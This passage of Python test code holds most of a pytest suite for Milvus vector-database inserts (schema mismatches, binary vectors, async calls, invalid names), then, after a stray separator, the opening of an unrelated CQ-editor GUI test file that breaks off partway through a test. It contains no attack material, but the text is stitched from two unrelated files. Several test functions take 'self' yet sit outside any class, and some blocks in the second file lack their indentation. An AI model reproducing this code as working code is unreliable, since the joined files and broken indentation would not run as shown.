    assert len(result.primary_keys) == default_nb
    connect.flush([collection])
    stats = connect.get_collection_stats(collection)
    assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it, with the not existed partition_name param
    expected: error raised
    """
    # Random unique tag guarantees the partition does not exist.
    tag = ut.gen_unique_str()
    with pytest.raises(Exception) as e:
        connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
    """
    target: test insert entities in collection created before
    method: create collection and insert entities in it repeatedly, with the partition_name param
    expected: the collection row count equals to nq
    """
    connect.create_partition(collection, default_tag)
    # Two identical inserts; both batches should be counted.
    result = connect.insert(collection, default_entities, partition_name=default_tag)
    result = connect.insert(collection, default_entities, partition_name=default_tag)
    connect.flush([collection])
    res = connect.get_collection_stats(collection)
    assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
    """
    target: test insert entities, the vector dimension is not equal to the collection dimension
    method: the entities dimension is half of the collection dimension, check the status
    expected: error raised
    """
    # Generate vectors at half the collection's dimension.
    vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
    insert_entities = copy.deepcopy(default_entities)
    # The last field is the vector field.
    insert_entities[-1]["values"] = vectors
    with pytest.raises(Exception) as e:
        connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
    """
    target: test insert entities, with the entity field name updated
    method: update entity field name
    expected: error raised
    """
    # Rename "int64" so it no longer matches the collection schema.
    tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
    with pytest.raises(Exception):
        connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
    """
    target: test insert entities, with the entity field type updated
    method: update entity field type
    expected: error raised
    """
    # Declare the int64 field as FLOAT so it mismatches the schema.
    tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
    with pytest.raises(Exception):
        connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
    """
    target: test insert entities, with the entity field value updated
    method: update entity field value
    expected: error raised
    """
    # Put a string value into the FLOAT field.
    tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
    with pytest.raises(Exception):
        connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
    """
    target: test insert entities, with more fields than collection schema
    method: add entity field
    expected: error raised
    """
    # Append an extra scalar field not present in the schema.
    tmp_entity = ut.add_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
    """
    target: test insert entities, with more fields than collection schema
    method: add entity vector field
    expected: error raised
    """
    # Append an extra vector field not present in the schema.
    tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
    with pytest.raises(Exception):
        connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
    """
    target: test insert entities, with less fields than collection schema
    method: remove entity field
    expected: error raised
    """
    # Drop a scalar field so the entity is missing one schema field.
    narrowed_entity = ut.remove_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, narrowed_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
    """
    target: test insert entities, with less fields than collection schema
    method: remove entity vector field
    expected: error raised
    """
    # Drop the vector field so the entity is missing the vector column.
    narrowed_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
    with pytest.raises(Exception):
        connect.insert(collection, narrowed_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
    """
    target: test insert entities, with no vector field value
    method: remove entity values of vector field
    expected: error raised
    """
    entity = copy.deepcopy(default_entity)
    # Strip the "values" key from the vector field.
    entity[-1].pop("values")
    with pytest.raises(Exception):
        connect.insert(collection, entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
    """
    target: test insert entities, with no vector field type
    method: remove entity vector field
    expected: error raised
    """
    entity = copy.deepcopy(default_entity)
    # Strip the "type" key from the vector field.
    entity[-1].pop("type")
    with pytest.raises(Exception):
        connect.insert(collection, entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
    """
    target: test insert entities, with no vector field name
    method: remove entity vector field
    expected: error raised
    """
    entity = copy.deepcopy(default_entity)
    # Strip the "name" key from the vector field.
    entity[-1].pop("name")
    with pytest.raises(Exception):
        connect.insert(collection, entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
    """
    target: test collection rows_count is correct or not with multi threading
    method: create collection and insert entities in it(idmap),
            assert the value returned by count_entities method is equal to length of entities
    expected: the count is equal to the length of entities
    """
    if args["handler"] == "HTTP":
        pytest.skip("Skip test in http mode")
    thread_num = 8
    milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)

    def insert_task(idx):
        logging.getLogger().info("In thread-%d" % idx)
        milvus.insert(collection, default_entities)
        milvus.flush([collection])

    workers = [threading.Thread(target=insert_task, args=(i,)) for i in range(thread_num)]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    stats = milvus.get_collection_stats(collection)
    # Every thread inserted default_nb entities.
    assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
    """
    target: test insert entities, with disable auto-flush
    method: disable auto-flush and insert, get entity
    expected: the count is equal to 0
    """
    fetch_num = 500
    ut.disable_flush(connect)
    result = connect.insert(collection, default_entities)
    inserted_ids = result.primary_keys
    res = connect.get_entity_by_id(collection, inserted_ids[:fetch_num])
    assert len(res) == fetch_num
    # With auto-flush disabled the data is not yet queryable.
    assert res[0] is None
class TestInsertBinary:
    """Insert tests against binary-vector collections (JACCARD metric)."""

    @pytest.fixture(
        scope="function",
        params=ut.gen_binary_index()
    )
    def get_binary_index(self, request):
        # Binary indexes require a binary metric; force JACCARD for every param.
        request.param["metric_type"] = "JACCARD"
        return request.param

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_entities(self, connect, binary_collection):
        """
        target: test insert entities in binary collection
        method: create collection and insert binary entities in it
        expected: the collection row count equals to nb
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_partition(self, connect, binary_collection):
        """
        target: test insert entities and create partition tag
        method: create collection and insert binary entities in it, with the partition_name param
        expected: the collection row count equals to nb
        """
        connect.create_partition(binary_collection, default_tag)
        result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        assert connect.has_partition(binary_collection, default_tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_multi_times(self, connect, binary_collection):
        """
        target: test insert entities multi times and final flush
        method: create collection and insert binary entity multi and final flush
        expected: the collection row count equals to nb
        """
        # Insert one entity per call, nb times, flushing only once at the end.
        for i in range(default_nb):
            result = connect.insert(binary_collection, default_binary_entity)
            assert len(result.primary_keys) == 1
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test insert binary entities after build index
        method: build index and insert entities
        expected: no error raised
        """
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test build index insert after vector
        method: insert vector and build index
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_search(self, connect, binary_collection):
        """
        target: test search vector after insert vector after a while
        method: insert vector, sleep, and search collection
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        connect.flush([binary_collection])
        query, _ = ut.gen_search_vectors_params(binary_field_name, default_binary_entities,
                                                ut.default_top_k, 1, metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, **query)
        logging.getLogger().debug(res)
        assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
    """Insert tests exercising the asynchronous (_async=True) code path."""

    @pytest.fixture(scope="function", autouse=True)
    def skip_http_check(self, args):
        # Async insert is not exercised over the HTTP handler.
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")

    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000
        ],
    )
    def insert_count(self, request):
        yield request.param

    def check_status(self, result):
        # Callback used where the async insert is expected to fail / time out.
        logging.getLogger().info("In callback check status")
        assert not result

    def check_result(self, result):
        # Callback used where the async insert is expected to succeed.
        logging.getLogger().info("In callback check results")
        assert result

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        future = connect.insert(collection, ut.gen_entities(nb), _async=True)
        ids = future.result().primary_keys
        connect.flush([collection])
        assert len(ids) == nb

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_false(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        # _async=False returns the result directly, not a future.
        result = connect.insert(collection, ut.gen_entities(nb), _async=False)
        connect.flush([collection])
        assert len(result.primary_keys) == nb

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_callback(self, connect, collection, insert_count):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = insert_count
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
        future.done()
        ids = future.result().primary_keys
        assert len(ids) == nb

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_long(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = 50000
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
        result = future.result()
        assert len(result.primary_keys) == nb
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        logging.getLogger().info(stats)
        assert stats[row_count] == nb

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_callback_timeout(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        nb = 100000
        # A 1-second timeout on a 100k-entity insert is expected to expire.
        future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
        with pytest.raises(Exception) as e:
            result = future.result()

    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_async_invalid_params(self, connect):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        # The collection was never created, so resolving the future must fail.
        collection_new = ut.gen_unique_str()
        future = connect.insert(collection_new, default_entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            result = future.result()

    # 1339
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_async_invalid_params_raise_exception(self, connect, collection):
        """
        target: test insert vectors with different length of vectors
        method: set different vectors as insert method params
        expected: length of ids is equal to the length of vectors
        """
        entities = []
        future = connect.insert(collection, entities, _async=True)
        future.done()
        with pytest.raises(Exception) as e:
            future.result()
class TestInsertMultiCollections:
    """
    ******************************************************************
      The following cases are used to test `insert` function
    ******************************************************************
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        logging.getLogger().info(request.param)
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_multi_collections(self, connect):
        """
        target: test insert entities
        method: create 10 collections and insert entities into them in turn
        expected: row count
        """
        collection_num = 10
        collection_list = []
        for i in range(collection_num):
            collection_name = ut.gen_unique_str(uid)
            collection_list.append(collection_name)
            connect.create_collection(collection_name, default_fields)
            result = connect.insert(collection_name, default_entities)
            connect.flush([collection_name])
            assert len(result.primary_keys) == default_nb
            stats = connect.get_collection_stats(collection_name)
            assert stats[row_count] == default_nb
        for i in range(collection_num):
            connect.drop_collection(collection_list[i])

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_drop_collection_insert_entity_another(self, connect, collection):
        """
        target: test insert vector to collection_1 after collection_2 deleted
        method: delete collection_2 and insert vector to collection_1
        expected: row count equals the length of entities inserted
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.drop_collection(collection)
        result = connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        assert len(result.primary_keys) == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection_name, default_entity)
        assert len(result.primary_keys) == 1
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        connect.drop_collection(collection_name)

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection_name, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1 for a while
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_entity_insert_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.load_collection(collection)
        res = connect.search(collection, **default_single_query)
        assert len(res[0]) == 0
        connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_search_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, **default_single_query)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_search_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2 a while
        method: search collection, sleep, and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, **default_single_query)
        assert len(res[0]) == 0

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_entity_during_release_collection(self, connect, collection):
        """
        target: test insert entity during release
        method: release collection async, then do insert operation
        expected: insert ok
        """
        for i in range(10):
            connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)

        def release():
            connect.release_collection(collection)

        # Fix: release() takes no parameters -- the original passed
        # args=(collection,), which made the worker thread die with a
        # TypeError before the release ever ran.
        t = threading.Thread(target=release)
        t.start()
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
    """
    Test inserting vectors with invalid collection names
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(id_collection, default_entities, ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid collection name
        expected: raise exception
        """
        collection_name = get_collection_name
        with pytest.raises(Exception):
            connect.insert(collection_name, default_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid partition name
        expected: raise exception
        """
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        # A None partition name means "no partition", so that case must succeed.
        if tag_name is not None:
            with pytest.raises(Exception):
                connect.insert(collection, default_entity, partition_name=tag_name)
        else:
            connect.insert(collection, default_entity, partition_name=tag_name)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
        """
        target: test insert with invalid field name
        method: insert with invalid field name
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
        """
        target: test insert with invalid field
        method: insert with invalid field type
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        field_value = get_field_int_value
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
        """
        target: test insert with invalid entity
        method: insert with invalid entity value
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_entity)
        src_vector = tmp_entity[-1]["values"]
        # Corrupt a single component of the first vector.
        src_vector[0][1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
    """
    Test inserting vectors with invalid collection names
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
        """
        target: test insert with invalid field name
        method: insert with invalid field name
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
        """
        target: test insert with invalid field value
        method: insert with invalid int64 field value
        expected: raise exception
        """
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid scenario
        method: insert with invalid field entity
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_binary_entity)
        src_vectors = tmp_entity[-1]["values"]
        # Replace the first binary vector with an invalid value.
        src_vectors[0] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(binary_id_collection, default_binary_entities, ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
        """
        target: test insert with invalid field type
        method: insert with invalid field type
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        tmp_entities = copy.deepcopy(default_binary_entities)
        src_vector = tmp_entities[-1]["values"]
        # Replace one binary vector in the batch with an invalid value.
        src_vector[1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entities)
|
test_app.py | from path import Path
import os, sys, asyncio
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
from multiprocessing import Process
import pytest
import pytestqt
import cadquery as cq
from PyQt5.QtCore import Qt, QSettings
from PyQt5.QtWidgets import QFileDialog, QMessageBox
from cq_editor.__main__ import MainWindow
from cq_editor.widgets.editor import Editor
from cq_editor.cq_utils import export, get_occ_color
code = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)'''
code_bigger_object = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(20, 20, 0.5)
result = result.edges("|Z").fillet(0.125)
'''
code_show_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result)
'''
code_show_Workplane_named = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
log('test')
show_object(result,name='test')
'''
code_show_Shape = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
show_object(result.val())
'''
code_debug_Workplane = \
'''import cadquery as cq
result = cq.Workplane("XY" )
result = result.box(3, 3, 0.5)
result = result.edges("|Z").fillet(0.125)
debug(result)
'''
code_multi = \
'''import cadquery as cq
result1 = cq.Workplane("XY" ).box(3, 3, 0.5)
result2 = cq.Workplane("XY" ).box(3, 3, 0.5).translate((0,15,0))
'''
def _modify_file(code):
with open('test.py', 'w', 1) as f:
f.write(code)
def modify_file(code):
    """Rewrite test.py from a separate process and wait for it to finish."""
    writer = Process(target=_modify_file, args=(code,))
    writer.start()
    writer.join()
def get_center(widget):
    """Return the position of *widget*'s centre point."""
    center = widget.pos()
    center.setX(center.x() + widget.width() // 2)
    center.setY(center.y() + widget.height() // 2)
    return center
def get_bottom_left(widget):
    """Return the position of *widget*'s bottom-left corner."""
    corner = widget.pos()
    corner.setY(corner.y() + widget.height())
    return corner
def get_rgba(ais):
    """Return (red, green, blue, alpha) floats for an AIS interactive object.

    Fixes a copy-paste bug: the original returned the red channel three
    times (redF, redF, redF) instead of red, green and blue.
    """
    alpha = ais.Transparency()
    color = get_occ_color(ais)
    return color.redF(), color.greenF(), color.blueF(), alpha
@pytest.fixture
def main(qtbot,mocker):
    """Main window with the basic script loaded and already executed once."""
    # Auto-confirm any "are you sure?" dialogs.
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)

    win = MainWindow()
    win.show()
    qtbot.addWidget(win)

    editor = win.components['editor']
    editor.set_text(code)

    # Trigger a first Run so the object tree is populated.
    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    return qtbot, win
@pytest.fixture
def main_clean(qtbot,mocker):
    """Main window with the basic script loaded but NOT yet executed."""
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)

    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    qtbot.waitForWindowShown(win)

    editor = win.components['editor']
    editor.set_text(code)

    return qtbot, win
@pytest.fixture
def main_clean_do_not_close(qtbot,mocker):
    """Like main_clean, but confirmation dialogs answer No (e.g. refuse close)."""
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.No)

    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    qtbot.waitForWindowShown(win)

    editor = win.components['editor']
    editor.set_text(code)

    return qtbot, win
@pytest.fixture
def main_multi(qtbot,mocker):
    """Main window with the two-result script loaded and executed once.

    Save dialogs are stubbed to always pick 'out.step'.
    """
    mocker.patch.object(QMessageBox, 'question', return_value=QMessageBox.Yes)
    mocker.patch.object(QFileDialog, 'getSaveFileName', return_value=('out.step',''))

    win = MainWindow()
    win.show()
    qtbot.addWidget(win)
    qtbot.waitForWindowShown(win)

    editor = win.components['editor']
    editor.set_text(code_multi)

    debugger = win.components['debugger']
    debugger._actions['Run'][0].triggered.emit()

    return qtbot, win
def test_render(main):
    """Objects appear in (and can be cleared from) the object tree via Run,
    show_object(), and the console."""
    qtbot, win = main

    obj_tree_comp = win.components['object_tree']
    editor = win.components['editor']
    debugger = win.components['debugger']
    console = win.components['console']
    log = win.components['log']

    # enable CQ reloading
    debugger.preferences['Reload CQ'] = True

    # check that object was rendered
    assert(obj_tree_comp.CQ.childCount() == 1)

    # check that object was removed
    obj_tree_comp._toolbar_actions[0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 0)

    # check that object was rendered using explicit show_object call
    editor.set_text(code_show_Workplane)
    debugger._actions['Run'][0].triggered.emit()
    assert(obj_tree_comp.CQ.childCount() == 1)

